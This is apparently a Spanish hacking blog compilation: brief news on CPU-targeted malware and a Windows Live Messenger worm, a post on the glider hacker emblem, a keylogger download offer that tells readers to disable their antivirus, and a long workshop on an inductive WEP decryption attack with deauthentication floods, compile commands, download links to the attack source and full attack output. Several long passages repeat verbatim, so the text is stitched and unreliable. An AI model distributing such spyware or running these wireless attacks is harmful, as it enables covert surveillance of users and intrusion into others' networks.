El malware suele tratar con vulnerabilidades en el sistema operativo/software popular que viene a significar que los usuarios tienen que ir aplicando de manera frecuente parches y ejecutar el antivirus para evitar tales problemas. La Ecole Superiore d’Informatique, Electronique, Automatique acaba de demostrar cómo se puede crear malware para un procesador en particular, ignorando el sistema operativo en sí.
Tanto si el ataque discrimina el sistema operativo o el hardware la técnica es la misma, encontrar un bug/fallo y explotarlo. Las arquitecturas de los procesadores pueden ser identificadas estudiando cómo ejecuta el procesador, cálculos aritméticos y la forma de codificar números. Sin embargo esta técnica no es tan refinada como los atacantes de malware podrían querer.
Los investigadores admiten que la técnica de identificación no puede hacer pin-point a procesadores particulares, sin embargo han comentado que el ataque podría “dar lugar a ataques más precisos y enfocados, a un nivel más fino en redes grandes de máquinas heterogéneas pero con malware genérico“.
Posted by Star | Posted in | Posted on 21:42
Desde el blog de Windows Live, nos llega una alerta en la que Microsoft ha desactivado temporalmente los vínculos activos para Windows Live Messenger 2009 Su motivo, es, que quiere evitar a un gusano dañino que está tratando de extenderse a través de los Messenger (incluido éste) e incluso redes sociales. El gusano se propaga mediante la inserción de un vínculo en una conversación de mensajería instantánea con otro equipo infectado. Conoce más detalles a continuación.
Un gusano dañino está intentado propagarse a través de Messenger, incluido Windows Live 2009. Para evitar daños, Microsoft ha tomado la decisión de desactivar los enlaces activos en el Messenger 2009, ya que éste es uno de los afectados.
El gusano, se propaga mediante la inserción de un vínculo desde otro equipo infectado en una conversación de mensajería instantánea. Cuando el usuario hace click en el enlace, se abre en un navegador y descarga el gusano en el ordenador del receptor, y luego repite el proceso.
Esto hace que su propagación sea muy sencilla y fácil, ya que se instala en el ordenador del usuario y sin darse cuenta, el navegador le envía a un sitio web que contiene el software malicioso y sin saberlo el propio usuario.
Como ya sabemos, ésta es una manera muy habitual y bastante común de propagar malware. Además en una red tan grande como es Live Messenger y con todo lo que abarca tal, el gusano podría propagarse con mucha rapidez y poner en grandes apuros al usuario y a toda la red de mensajería en general.
Por otra parte, el cierre de los vínculo activos URL o su desactivación temporal por parte de Microsoft, es un buen paso para evitar la propagación de malware y gusanos y mantendrá Windows Live Messenger seguro hasta que el gigante dé una solución final y acertada al problema. De momento y mientras, Microsoft está trabajando en una solución a éste problema.
Un gusano dañino está intentado propagarse a través de Messenger, incluido Windows Live 2009. Para evitar daños, Microsoft ha tomado la decisión de desactivar los enlaces activos en el Messenger 2009, ya que éste es uno de los afectados.
El gusano, se propaga mediante la inserción de un vínculo desde otro equipo infectado en una conversación de mensajería instantánea. Cuando el usuario hace click en el enlace, se abre en un navegador y descarga el gusano en el ordenador del receptor, y luego repite el proceso.
Esto hace que su propagación sea muy sencilla y fácil, ya que se instala en el ordenador del usuario y sin darse cuenta, el navegador le envía a un sitio web que contiene el software malicioso y sin saberlo el propio usuario.
Como ya sabemos, ésta es una manera muy habitual y bastante común de propagar malware. Además en una red tan grande como es Live Messenger y con todo lo que abarca tal, el gusano podría propagarse con mucha rapidez y poner en grandes apuros al usuario y a toda la red de mensajería en general.
Por otra parte, el cierre de los vínculo activos URL o su desactivación temporal por parte de Microsoft, es un buen paso para evitar la propagación de malware y gusanos y mantendrá Windows Live Messenger seguro hasta que el gigante dé una solución final y acertada al problema. De momento y mientras, Microsoft está trabajando en una solución a éste problema.
Si estamos ejecutando Live Messenger 2009, éste es un buen momento para considerar la actualización a la versión del Messenger 2011.
Posted by Star | Posted in | Posted on 7:02
Encontré esta propuesta de un símbolo para la comunidad hacker (entendiendo hacker tal y como lo define la Wikipedia y como los propios hackers se definen a si mismos, como expertos en una rama de la computación, y no como un delincuente informático). La propuesta está hecha por Eric S. Raymond, un “sociólogo” de la computación de prestigio reconocido.
A mi la propuesta me ha gustado, sobre todo por la justificación detrás de la elección de ese símbolo en concreto. Se trata de la configuración “deslizador” del Juego de la Vida.
El Juego de la Vida es una simulación de vida artificial de unos átomos (cada uno de los puntos negros) situados sobre un mundo (una cuadrícula). Hay unas reglas sencillas para saber como dichos átomos nacen o mueren:
- Una célula nace cuando tiene a su alrededor exactamente 3 células vecinas.
- Una célula con 2 o 3 células vecinas sigue viva.
- En cualquier otro caso la célula muere (por soledad o superpoblación)
Lo curioso de este juego es que a partir de estas sencillísimas reglas se produce un comportamiento emergente (sobre el cual comenté un excelente libro hace poco). Es decir, hay un comportamiento de “moléculas” (configuraciones de átomos) que no es evidente en las reglas del juego.
Así, hay moléculas que se quedan quietas, pero hay otras que se mueven, otras que son disparadores de otras moléculas, otras que se reproducen a si mismas, etc.
Concretamente la molécula elegida para el símbolo hacker es el deslizador (glider), que es la molécula más pequeña que se mueve. Aquí podéis ver una animación de como evoluciona el deslizador.
La idoneidad de este símbolo por lo tanto es triple:
- Es un símbolo del Juego de la Vida, un juego relacionado desde hace mucho tiempo con la computación.
- Está relacionado con la emergencia, del mismo modo que de la comunidad hacker emerge una colaboración positiva que ha dado a luz el proyecto GNU, linux y un largo etcétera.
- Es una configuración simple (solo 5 átomos) pero “con movimiento”.
Podéis probar el Juego de la Vida mediante los varios applets enlazados desde la página de la Wikipedia, además de leer esta pequeña introducción muy clara (que ya he añadido a la wikipedia)
:: KeyLogger ::
Breve Explicación
Un keylogger (derivado del inglés: Key (tecla) y Logger (Registrador);
Suele usarse como malware del tipo daemon, permitiendo que otros usuarios tengan
El
« Link de Descarga :
http://rapidshare.com/files/181985514/Douglas_Es.rar
« Requisitos e información adicional:
Tamaño de la Descarga: 915 KB = menos de 1 Mega
lo podes utilizar en cualquier computador desde
Algúnos ANTI-VIRUS lo detectan ya que es un
KeyLogger. Solo desactiva el ANTI-VIRUS y Ya.
No todos Reacciónan por Igual.
Asi que a Usarlo con Responsabilidad, y
Posted by Star | Posted in | Posted on 22:57
Ataque Inductivo.
Vamos a realizar un programa que ejecute el ataque inductivo, las funciones que utiliza son:
* send_packet, read_packet y dump_packet que como ya es habitual sirven para enviar, leer y/o mostrar el contenido de las tramas.
Funcion main.
* Lee del teclado un BSSID sobre el que se realizará el ataque
* Llama a la función ataque_inductivo pasándole como parámetro ese BSSID. ataque_inductivo(mi_AP)
Función ataque_inductivo
Esta función lo primero que hace es capturar un paquete ARP Request de la red elegida (BSSID) en el caso de que tras leer 500 paquetes no se consiga un ARP, procede a una desautenticación al broadcast para capturar uno.
La desautenticación la realiza llamando a una funcion que es:
desautenticar_todos(macAP)
O sea, se llama a esa función entregando como parámetro la mac del Punto de Acceso, esta función como ya hemos dicho enviará tramas de desautenticación al broadcast. Esta función ya la usamos en ejercicios anteriores y por tanto no comentaremos nada nuevo de ella.
Una nueva comprobación ha sido añadida para avanzar mas en nuestro Taller. Consiste en averiguar si se trata de un paquete con cifrado WEP.
AVISO!!! No me refiero a si el bit wep está activado (que lo debe estar si la red está protegida) me refiero a que si se trata CONCRETAMENTE de cifrado WEP u otro.
Te recuerdo que el bit wep activo indica cifrado pero no EL TIPO de cifrado, una red WPA tiene el bit wep activado, una red WEP tiene el bit wep activado también.
Luego el mero hecho de que esté activado el bit wep no significa obligatoriamente que se trate de una red WEP.
Creo que os lo puse como ejercicio (haceeee muuuuuchos post de ello) y parece que nadie “se atrevió” a contestar o a intentarlo, bien, pues ya va siendo hora de resolverlo.
Podemos averiguar rápidamente si una red utiliza cifrado WEP analizando el IV (Vector de inicialización) un IV de WEP es así:
Te recuerdo que WEP puede usar diferentes números de llave para la misma clave WEP, incluso estas llaves pueden ser dinámicas con el objeto de proteger aún mas la red.
Entonces si analizamos el último byte del IV podemos saber si es un cifrado WEP o no, este byte no es otra cosa que el key index.
Para WEP, el keyindex, debe ser un valor inferior a 32, de hecho ya conocemos que sólo se usarán 0, 1, 2 ó 3.
Para WPA se usa 0x60, por tanto si podemos hacer una operación AND del keyindex para saber si es WEP o no.
Algo así:
Recuerda que esta comprobación sólo es efectiva si se trata de una trama de DATOS!!! Puesto que si es de administración o control, esa posición no es el keyindex de la clave de cifrado.
Otras formas de averiguarlo, por ejemplo en un beacon o en un probe request o probe response, también se incluye como datos de los mismos el tipo de cifrado que se usa, pero la forma anterior es más sencilla de comprobarlo en esta ocasión.
El resto de comprobaciones que hace consiste en averiguar si se trata de un paquete ARP o no, y se analiza el tamaño, que tenga el bit wep activado, que sea un paquete de datos, que sea un paquete toDS y que el bssid de la trama capturada sea igual al bssid que le pasamos por teclado.
Observa que el paquete ha de ser toDS!!!
Sabes por qué, no????
Claro, si hemos desautenticado a las estaciones es lógico pensar que un ARP Request debe ser un paquete que una estación envía HACIA el sistema de distribución, por eso toDS.
Las otras condiciones son obvias y en cuanto al tamaño, recuerda lo explicado en el post de la teoría… 68 bytes para un ARP (o 70 si hay QoS)
Una vez que tenemos capturado un ARP REQ, ya podemos empezar, para ello se utilizan una serie de arrays que iran almacenando los datos necesarios, estos son:
add_crc32 que calculará el ICV para un texto plano dado, de esta función no debemos preocuparnos puesto que ya está incluida en las cabeceras crypto.h y programa crypto.c, recuerda simplemente lo que hace, calcular el crc32 de algo, que en nuestro caso será algo como esto:
Esto calcula el crc32 (ICV) del contenido de temporal y se lo añade en la posición que diga actual – 3.
También conviene aclarar que al ICV se le aplica una máscara u otra dependiendo de si se trata de un ICV de texto plano o un ICV cifrado, de esto ya hablaremos cuando expliquemos el bit-flipping, por elk momento, ni te preocupes de ello.
Para seguir con el ejemplo de la parte de teoría, imagina que la posición de actual es 15, por tanto lo que hará esta función es calcular el ICV de los primeros 15 bytes y los coloca en la posición 12,13,14 y 15 (tal y como veíamos en la figura) n = actual
Después se colocan la cabecera mac, el iv, se realizan las operaciones XOR necesarias, se coloca al ICV (sólo los 3 primeros bytes) y se entra en un ciclo de 256 repeticiones (una para cada posible valor de 0x00 a 0xFF)
Se van enviando estos paquetes con el “añadido” de ese último byte y se comprueban las respuestas.
La comprobación de las respuestas lo realiza un a nueva función llamada ver_envio_ap a la cual se le pasan como parámetros el bssid, el byte actual que está siendo descifrado y el valor del contador del ciclo (n).
La función ver_envio_ap, además, captura durante 150000 microsegundos (aprox. Un octavo de segundo) y “busca” en esas capturas si se produjo una respuesta válida al último paquete que enviamos, de tal forma que:
De todas formas en el código fuente del ejercicio dispones de numerosísimos comentarios que van (prácticamente línea por línea) aclarando qué se hace, para qué y cómo.
Lo puedes descargar en: http://www.megaupload.com/?d=VPG05ZR6
Lo guardas en el directorio de las fuentes de aircrack con el nombre arpdecode4.c (si… hubo versiones arpdecode 1, 2 y 3 antes de conseguir que funcionase fino)
y lo compilas:
Como ves, 20 segundos!!!! que frente a los 13 minutos del anterior... pues como mejor programado
En el código fuente del mismo tienes todos los comentarios necesarios para comprender cómo funciona y por qué es tan rápido.
Que lo disfrutes.
No vamos a menospreciar al “lento”, nos vendrá muy bien cuando nos toque WPA y queramos hacer algo similar, con WPA la cosa cambia porque los IV’s no se pueden/deben reutilizar, se controla la integridad del mensaje y el punto de acceso puede tomar “contramedidas” y obligar a todos los clientes a renegociar las llaves por lo que el ataque no puede continuar, todo llegará.
Ahora, un detector, para el siguiente post.
By Vic_Thor
Vamos a realizar un programa que ejecute el ataque inductivo, las funciones que utiliza son:
* send_packet, read_packet y dump_packet que como ya es habitual sirven para enviar, leer y/o mostrar el contenido de las tramas.
Funcion main.
* Lee del teclado un BSSID sobre el que se realizará el ataque
* Llama a la función ataque_inductivo pasándole como parámetro ese BSSID. ataque_inductivo(mi_AP)
Función ataque_inductivo
Esta función lo primero que hace es capturar un paquete ARP Request de la red elegida (BSSID) en el caso de que tras leer 500 paquetes no se consiga un ARP, procede a una desautenticación al broadcast para capturar uno.
La desautenticación la realiza llamando a una funcion que es:
desautenticar_todos(macAP)
O sea, se llama a esa función entregando como parámetro la mac del Punto de Acceso, esta función como ya hemos dicho enviará tramas de desautenticación al broadcast. Esta función ya la usamos en ejercicios anteriores y por tanto no comentaremos nada nuevo de ella.
Una nueva comprobación ha sido añadida para avanzar mas en nuestro Taller. Consiste en averiguar si se trata de un paquete con cifrado WEP.
AVISO!!! No me refiero a si el bit wep está activado (que lo debe estar si la red está protegida) me refiero a que si se trata CONCRETAMENTE de cifrado WEP u otro.
Te recuerdo que el bit wep activo indica cifrado pero no EL TIPO de cifrado, una red WPA tiene el bit wep activado, una red WEP tiene el bit wep activado también.
Luego el mero hecho de que esté activado el bit wep no significa obligatoriamente que se trate de una red WEP.
Creo que os lo puse como ejercicio (haceeee muuuuuchos post de ello) y parece que nadie “se atrevió” a contestar o a intentarlo, bien, pues ya va siendo hora de resolverlo.
Podemos averiguar rápidamente si una red utiliza cifrado WEP analizando el IV (Vector de inicialización) un IV de WEP es así:
Te recuerdo que WEP puede usar diferentes números de llave para la misma clave WEP, incluso estas llaves pueden ser dinámicas con el objeto de proteger aún mas la red.
Entonces si analizamos el último byte del IV podemos saber si es un cifrado WEP o no, este byte no es otra cosa que el key index.
Para WEP, el keyindex, debe ser un valor inferior a 32, de hecho ya conocemos que sólo se usarán 0, 1, 2 ó 3.
Para WPA se usa 0x60, por tanto si podemos hacer una operación AND del keyindex para saber si es WEP o no.
Algo así:
Recuerda que esta comprobación sólo es efectiva si se trata de una trama de DATOS!!! Puesto que si es de administración o control, esa posición no es el keyindex de la clave de cifrado.
Otras formas de averiguarlo, por ejemplo en un beacon o en un probe request o probe response, también se incluye como datos de los mismos el tipo de cifrado que se usa, pero la forma anterior es más sencilla de comprobarlo en esta ocasión.
El resto de comprobaciones que hace consiste en averiguar si se trata de un paquete ARP o no, y se analiza el tamaño, que tenga el bit wep activado, que sea un paquete de datos, que sea un paquete toDS y que el bssid de la trama capturada sea igual al bssid que le pasamos por teclado.
Observa que el paquete ha de ser toDS!!!
Sabes por qué, no????
Claro, si hemos desautenticado a las estaciones es lógico pensar que un ARP Request debe ser un paquete que una estación envía HACIA el sistema de distribución, por eso toDS.
Las otras condiciones son obvias y en cuanto al tamaño, recuerda lo explicado en el post de la teoría… 68 bytes para un ARP (o 70 si hay QoS)
Una vez que tenemos capturado un ARP REQ, ya podemos empezar, para ello se utilizan una serie de arrays que iran almacenando los datos necesarios, estos son:
- paquete_cifrado: Lógicamente se trata del paquete original h80211: Que se usará para enviar o recibir las tramas temporal: como su nombre indica es un almacén temporal y guardará los datos en texto plano conocidos y los que se vayan descifrando. OJO!!! Sólo los datos, sin cabeceras, sin IV’s y sin ICV’s. SOLO DATOS. crc32: pues será un array que almacena el icv resultante de temporal. F3: es un array temporal en el cual se va construyendo el paquete completo en plano, incluidos la cabecera MAC, IV, DATOS en PLANO e ICV key_stream: pues será donde iremos guardando el resultado de hacer XOR entre el paquete en plano y el paquete cifrado. Este array keystream comienza con el IV, es decir, los primeros 4 bytes realmente no es el keystream sino el IV. paq_plano: es otro array que almacena el texto plano, similar al array temporal del que hablamos antes.
- mi_ARP contiene los primeros 15 bytes bien conocidos de un paquete ARP (repasa la teoría si no lo ves claro) inicio, es la posición inicial del ataque, para nuestro caso será 15 final: es el último byte a descifrar, para nuestro ejemplo 36 de datos + 4 para el ICV original = 40 bytes a descifrar actual: que marcará el byte que está siendo analizado, al comienzo de todo el ataque actual=inicio y cuando termine deberá ser igual a final. Actual se irá incrementando en una unidad a medida que vamos descifrando nuevos bytes.
add_crc32 que calculará el ICV para un texto plano dado, de esta función no debemos preocuparnos puesto que ya está incluida en las cabeceras crypto.h y programa crypto.c, recuerda simplemente lo que hace, calcular el crc32 de algo, que en nuestro caso será algo como esto:
Esto calcula el crc32 (ICV) del contenido de temporal y se lo añade en la posición que diga actual – 3.
También conviene aclarar que al ICV se le aplica una máscara u otra dependiendo de si se trata de un ICV de texto plano o un ICV cifrado, de esto ya hablaremos cuando expliquemos el bit-flipping, por elk momento, ni te preocupes de ello.
Para seguir con el ejemplo de la parte de teoría, imagina que la posición de actual es 15, por tanto lo que hará esta función es calcular el ICV de los primeros 15 bytes y los coloca en la posición 12,13,14 y 15 (tal y como veíamos en la figura) n = actual
Después se colocan la cabecera mac, el iv, se realizan las operaciones XOR necesarias, se coloca al ICV (sólo los 3 primeros bytes) y se entra en un ciclo de 256 repeticiones (una para cada posible valor de 0x00 a 0xFF)
Se van enviando estos paquetes con el “añadido” de ese último byte y se comprueban las respuestas.
La comprobación de las respuestas lo realiza un a nueva función llamada ver_envio_ap a la cual se le pasan como parámetros el bssid, el byte actual que está siendo descifrado y el valor del contador del ciclo (n).
La función ver_envio_ap, además, captura durante 150000 microsegundos (aprox. Un octavo de segundo) y “busca” en esas capturas si se produjo una respuesta válida al último paquete que enviamos, de tal forma que:
- Entregará como resultado 0 (cero) si no hubo respuesta Un valor distinto a cero si acertamos con el byte.
Si encontramos un paquete de ese tamaño y que cumpla las otras condiciones como que sea wep, que sea de datos, que el bssid sea el que escribimos por teclado Y QUE SEA fromDS!!!!!, podemos asegurar que es el nuestro.
Ojo!!! Importante lo de fromDS, está claro, si nosotros enviamos paquetes modificados con el bit toDS activado (HACIA), es de suponer que cuando alguno de ellos “sea el corecto” el punto de acceso responderá con el bit fromDS (DESDE) activado.
Todo esto lo realiza la función ver_envio_ap
Por último, si se recibió la respuesta se muestra por pantalla, se incrementa actual en una unidad y el contador de posibilidades (n) vuelve a cero.
Si no hubo respuesta, se incrementa al contador (n) en uno y se prueba de nuevo todo el proceso.
Si agotamos todas las posibilidades de n bytes (de 0 a 256) lo repetimos de nuevo desde la posición actual -1 (recuerda lo que se dijo en la parte de teoría acerca de los problemas de transmisión o de falsos positivos.
Si falla el envío desde la posición inicial (15) el ataque no tuvo éxito y deberíamos repetir todo desde el inicio.
En fin, esta es la secuencia del ataque, en esta ocasión y dado que el código fuente es un poquito mas largo que de costumbre, he preferido explicarlo en lugar de postearlo sin mas.
Este es un diagrama básico de lo cómo funciona en bloques el ataque inductivo que implementa este programa:
Ojo!!! Importante lo de fromDS, está claro, si nosotros enviamos paquetes modificados con el bit toDS activado (HACIA), es de suponer que cuando alguno de ellos “sea el corecto” el punto de acceso responderá con el bit fromDS (DESDE) activado.
Todo esto lo realiza la función ver_envio_ap
Por último, si se recibió la respuesta se muestra por pantalla, se incrementa actual en una unidad y el contador de posibilidades (n) vuelve a cero.
Si no hubo respuesta, se incrementa al contador (n) en uno y se prueba de nuevo todo el proceso.
Si agotamos todas las posibilidades de n bytes (de 0 a 256) lo repetimos de nuevo desde la posición actual -1 (recuerda lo que se dijo en la parte de teoría acerca de los problemas de transmisión o de falsos positivos.
Si falla el envío desde la posición inicial (15) el ataque no tuvo éxito y deberíamos repetir todo desde el inicio.
En fin, esta es la secuencia del ataque, en esta ocasión y dado que el código fuente es un poquito mas largo que de costumbre, he preferido explicarlo en lugar de postearlo sin mas.
Este es un diagrama básico de lo cómo funciona en bloques el ataque inductivo que implementa este programa:
De todas formas en el código fuente del ejercicio dispones de numerosísimos comentarios que van (prácticamente línea por línea) aclarando qué se hace, para qué y cómo.
Lo puedes descargar en: http://www.megaupload.com/?d=VPG05ZR6
Lo guardas en el directorio de las fuentes de aircrack con el nombre arpdecode4.c (si… hubo versiones arpdecode 1, 2 y 3 antes de conseguir que funcionase fino)
y lo compilas:
- Código:
gcc -g -W -Wall -Werror -O3 -D_FILE_OFFSET_BITS=64 -D_REVISION=0 -Iinclude -c -o arpdecode4.o arpdecode4.c gcc -g -W -Wall -Werror -O3 -D_FILE_OFFSET_BITS=64 -D_REVISION=0 -Iinclude arpdecode4.o common.o crypto.o -o arpdecode4 -Losdep -losdep -lssl -lcrypto
Taller_WiFi src # ./arpdecode4 eth1
Escribe la MAC del bssid o Punto de Acceso -----> 00:16:B6:41:03:5D
Leyendo paquete número 499 on destino a --------> 00:16:B6:41:03:5D:
ATENCION!!! Parece que no se capturan ARP_REQ
*********** Probando desautenticación al broadcast
Desautenticación
****************
C0 00 3C 02 FF FF FF FF FF FF 00 16 B6 41 03 5D
00 16 B6 41 03 5D 00 00 04 00
Enviando Desautenticación número 8
<---- Encontrado paquete ---->
<---- Esperando 3 Segundos--->
Paquete CIFRADO ORIGINAL (solo los datos + ICV)
***********************************************
80 E3 C3 5A 5F 12 30 50 D4 01 D5 65 3E 3D 6F E1
09 EA 6F 7F 50 D3 B1 79 55 53 EF EE 03 64 98 7E
CC F9 9F EF 53 07 FC AF
-> Byte num. 1 Candidato n/a keystream 2A byte cifrado: 80 byte decode AA <--- DATOS conocidos --> CABECERA SNAP
-> Byte num. 2 Candidato n/a keystream 49 byte cifrado: E3 byte decode AA <--- DATOS conocidos --> CABECERA SNAP
-> Byte num. 3 Candidato n/a keystream C0 byte cifrado: C3 byte decode 03 <--- DATOS conocidos --> CABECERA SNAP
-> Byte num. 4 Candidato n/a keystream 5A byte cifrado: 5A byte decode 00 <--- DATOS conocidos --> CABECERA SNAP
-> Byte num. 5 Candidato n/a keystream 5F byte cifrado: 5F byte decode 00 <--- DATOS conocidos --> CABECERA SNAP
-> Byte num. 6 Candidato n/a keystream 12 byte cifrado: 12 byte decode 00 <--- DATOS conocidos --> CABECERA SNAP
-> Byte num. 7 Candidato n/a keystream 38 byte cifrado: 30 byte decode 08 <--- DATOS conocidos --> Protocolo ARP
-> Byte num. 8 Candidato n/a keystream 56 byte cifrado: 50 byte decode 06 <--- DATOS conocidos --> Protocolo ARP
-> Byte num. 9 Candidato n/a keystream D4 byte cifrado: D4 byte decode 00 <--- DATOS conocidos --> Hardware Ethernet
-> Byte num. 10 Candidato n/a keystream 00 byte cifrado: 01 byte decode 01 <--- DATOS conocidos --> Hardware Ethernet
-> Byte num. 11 Candidato n/a keystream DD byte cifrado: D5 byte decode 08 <--- DATOS conocidos --> Protocolo IP
-> Byte num. 12 Candidato n/a keystream 65 byte cifrado: 65 byte decode 00 <--- DATOS conocidos --> Protocolo IP
-> Byte num. 13 Candidato n/a keystream 38 byte cifrado: 3E byte decode 06 <--- DATOS conocidos --> Longitud MAC
-> Byte num. 14 Candidato n/a keystream 39 byte cifrado: 3D byte decode 04 <--- DATOS conocidos --> Versión IP
-> Byte num. 15 Candidato n/a keystream 6F byte cifrado: 6F byte decode 00 <--- DATOS conocidos --> ARP (REQ ó RESP)
-> Byte num. 16 Candidato 5B keystream E0 byte cifrado: E1 byte decode 01 <--- ARP REQUEST
-> Byte num. 17 Candidato 9E keystream 09 byte cifrado: 09 byte decode 00 <--- MAC ORIGEN
-> Byte num. 18 Candidato F7 keystream FD byte cifrado: EA byte decode 17 <--- MAC ORIGEN
-> Byte num. 19 Candidato 44 keystream F5 byte cifrado: 6F byte decode 9A <--- MAC ORIGEN
-> Byte num. 20 Candidato 4D keystream BC byte cifrado: 7F byte decode C3 <--- MAC ORIGEN
-> Byte num. 21 Candidato 16 keystream 86 byte cifrado: 50 byte decode D6 <--- MAC ORIGEN
-> Byte num. 22 Candidato E8 keystream 6A byte cifrado: D3 byte decode B9 <--- MAC ORIGEN
-> Byte num. 23 Candidato A6 keystream BB byte cifrado: B1 byte decode 0A <--- IP ORIGEN (decimal 10)
-> Byte num. 24 Candidato AF keystream 73 byte cifrado: 79 byte decode 0A <--- IP ORIGEN (decimal 10)
-> Byte num. 25 Candidato 67 keystream 5F byte cifrado: 55 byte decode 0A <--- IP ORIGEN (decimal 10)
-> Byte num. 26 Candidato 22 keystream 9B byte cifrado: 53 byte decode C8 <--- IP ORIGEN (decimal 200)
-> Byte num. 27 Candidato B0 keystream EF byte cifrado: EF byte decode 00 <--- MAC DESTINO
-> Byte num. 28 Candidato 39 keystream EE byte cifrado: EE byte decode 00 <--- MAC DESTINO
-> Byte num. 29 Candidato 74 keystream 03 byte cifrado: 03 byte decode 00 <--- MAC DESTINO
-> Byte num. 30 Candidato FD keystream 64 byte cifrado: 64 byte decode 00 <--- MAC DESTINO
-> Byte num. 31 Candidato AF keystream 98 byte cifrado: 98 byte decode 00 <--- MAC DESTINO
Candidato decode FF Byte actual 32 de 40
Vuelta atrás. Falló el último. Reintentando de nuevo a partir de la posición 30
-> Byte num. 31 Candidato AF keystream 98 byte cifrado: 98 byte decode 00 <--- MAC DESTINO
-> Byte num. 32 Candidato E6 keystream 7E byte cifrado: 7E byte decode 00 <--- MAC DESTINO
-> Byte num. 33 Candidato BD keystream C6 byte cifrado: CC byte decode 0A <--- IP DESTINO (decimal 10)
-> Byte num. 34 Candidato 47 keystream F3 byte cifrado: F9 byte decode 0A <--- IP DESTINO (decimal 10)
-> Byte num. 35 Candidato EE keystream 95 byte cifrado: 9F byte decode 0A <--- IP DESTINO (decimal 10)
-> Byte num. 36 Candidato FA keystream 1A byte cifrado: EF byte decode F5 <--- IP DESTINO (decimal 245)
-> Byte num. 37 Candidato C0 keystream 99 byte cifrado: 53 byte decode CA <--- ICV CRC32
-> Byte num. 38 Candidato 66 keystream 13 byte cifrado: 07 byte decode 14 <--- ICV CRC32
-> Byte num. 39 Candidato 9A keystream 55 byte cifrado: FC byte decode A9 <--- ICV CRC32
-> Byte num. 40 Candidato AF keystream E9 byte cifrado: AF byte decode 46 <--- ICV CRC32
Tipo ARP: REQUEST
MAC ORIGEN: 00 17 9A C3 D6 B9
IP ORIGEN: 10.10.10.200.
MAC DESTINO: 00 00 00 00 00 00
IP DESTINO: 10.10.10.245.
Parámetros WEP
**************
IV completo: 6C 6B 00 00
Num de KEY usada: 00
keystream;
6C 6B 00 00 2A 49 C0 5A 5F 12 38 56 D4 00 DD 65
38 39 6F E0 09 FD F5 BC 86 6A BB 73 5F 9B EF EE
03 64 98 7E C6 F3 95 1A 99 13 55 E9
Listo!!!
Duración total del ataque: 13 minutos 44 segundos
Taller_WiFi src #
El ataque “es lento” como puedes ver al finalizar el ataque se muestra la duración del mismo. (13 minutos 44 segundos) una pasada, vamos... y eso para unos pocos bytes...
Recuerda cómo funcionabe el programa:
Ehhh????
Pues sí, si hubiésemos estado un poco mas espabilados, podríamos haber creado una tabla con los 256 ICV’s posibles de cada candidato a enviar, de tal forma que al tenerlos ya “calculados” podemos enviar continuamente ráfagas de 256 posibles combinaciones (el envío de 256 paquetes no llega a un segundo).
De este modo no es necesario esperar un tiempo (150.000 ms) para ver si hay respuesta,
Sencillamente envío, leo, envio, leo, envio, leo y así hasta encontrar una coincidencia, cuando ocurra, consultamos la tabla de ICV’s generada y a por otro... esto es muchísimo más rápido, puesto que en menos de un segundo leeremos la respuesta del punto de acceso, como son 25 los bytes a descifrar, pues eso… en menos de 25 segundos lo tenemos.
El "problema" de usar este otro método, es que los envíos son más rápidos que las respuestas, por tanto, eso de envío-leo, envío-leo no es del todo así... la respuesta no será acorde al úlrimo paquete enviado... igual es 112 paquetes mas atrás... por eso es necesaria una tabla, para que cuando llegue la respuesta sepamos qué paquete la provocó.
Aun así, preferí hacerlo del modo que se ha resuelto, parece como mas claro: envío, capturo durante un tiempo para ver si hay respuesta, envio capturo durante un tiempo, etc…
Cuando veamos cómo funciona el ataque chophop y lo llevemos a la práctica, sí que usaremos esto de la tabla de ICV’s, porque si el paquete a descifrar es (por ejemplo de 386 bytes) si usamos la misma técnica que la del ataque inductivo, nos pasamos 2 horas de media para llevarlo a cabo, y eso es ya muuucho tiempo mirando una pantalla.
Bueno, venga, vale... te pongo un link de descarga de “la versión rápida”, se llama arpdecode5.c
http://www.megaupload.com/?d=LU210GBT
Lo guardas en el directorio de las fuentes de aircrack y lo compilas:
Ahora, vamos a ejecutarlo:
Recuerda cómo funcionabe el programa:
- Tenemos 40 bytes a “descubrir”, bueno, realmente 40 – 15 = 25 Puesto que los 15 primeros ya son “bien conocidos” Y por cada uno de esos 25 bytes a descifrar, el programa puede llegar a enviar hasta 256 combinaciones posibles. Entre envío y envío la función ver_envio_ap se toma 150.000 ms para husmear el medio y comprobar si hubo respuesta del último paquete enviado, por tanto en el peor de los casos, que sería descubrir el byte “bueno” como última combinación (256), el tiempo máximo del ataque es:
- (25 bytes a descubrir x 256 combinaciones x 150.000 ms) / 1.000.000 = 960 segundos en total, 16 minutos máximo. Un millón de ms (1.000.000) es un segundo
Ehhh????
Pues sí, si hubiésemos estado un poco mas espabilados, podríamos haber creado una tabla con los 256 ICV’s posibles de cada candidato a enviar, de tal forma que al tenerlos ya “calculados” podemos enviar continuamente ráfagas de 256 posibles combinaciones (el envío de 256 paquetes no llega a un segundo).
De este modo no es necesario esperar un tiempo (150.000 ms) para ver si hay respuesta,
Sencillamente envío, leo, envio, leo, envio, leo y así hasta encontrar una coincidencia, cuando ocurra, consultamos la tabla de ICV’s generada y a por otro... esto es muchísimo más rápido, puesto que en menos de un segundo leeremos la respuesta del punto de acceso, como son 25 los bytes a descifrar, pues eso… en menos de 25 segundos lo tenemos.
El "problema" de usar este otro método, es que los envíos son más rápidos que las respuestas, por tanto, eso de envío-leo, envío-leo no es del todo así... la respuesta no será acorde al úlrimo paquete enviado... igual es 112 paquetes mas atrás... por eso es necesaria una tabla, para que cuando llegue la respuesta sepamos qué paquete la provocó.
Aun así, preferí hacerlo del modo que se ha resuelto, parece como mas claro: envío, capturo durante un tiempo para ver si hay respuesta, envio capturo durante un tiempo, etc…
Cuando veamos cómo funciona el ataque chophop y lo llevemos a la práctica, sí que usaremos esto de la tabla de ICV’s, porque si el paquete a descifrar es (por ejemplo de 386 bytes) si usamos la misma técnica que la del ataque inductivo, nos pasamos 2 horas de media para llevarlo a cabo, y eso es ya muuucho tiempo mirando una pantalla.
Bueno, venga, vale... te pongo un link de descarga de “la versión rápida”, se llama arpdecode5.c
http://www.megaupload.com/?d=LU210GBT
Lo guardas en el directorio de las fuentes de aircrack y lo compilas:
Ahora, vamos a ejecutarlo:
Taller_WiFi src # ./arpdecode5 eth1
Escribe la MAC del bssid o Punto de Acceso -----> 00:16:B6:41:03:5D
**** Esperando un ARP REQ con destino a --------> 00:16:B6:41:03:5D:
Desautenticación
****************
C0 00 3C 02 FF FF FF FF FF FF 00 16 B6 41 03 5D
00 16 B6 41 03 5D 00 00 04 00
Enviando Desautenticación número 8
<---- Encontrado paquete ---->
<---- Esperando 3 Segundos--->
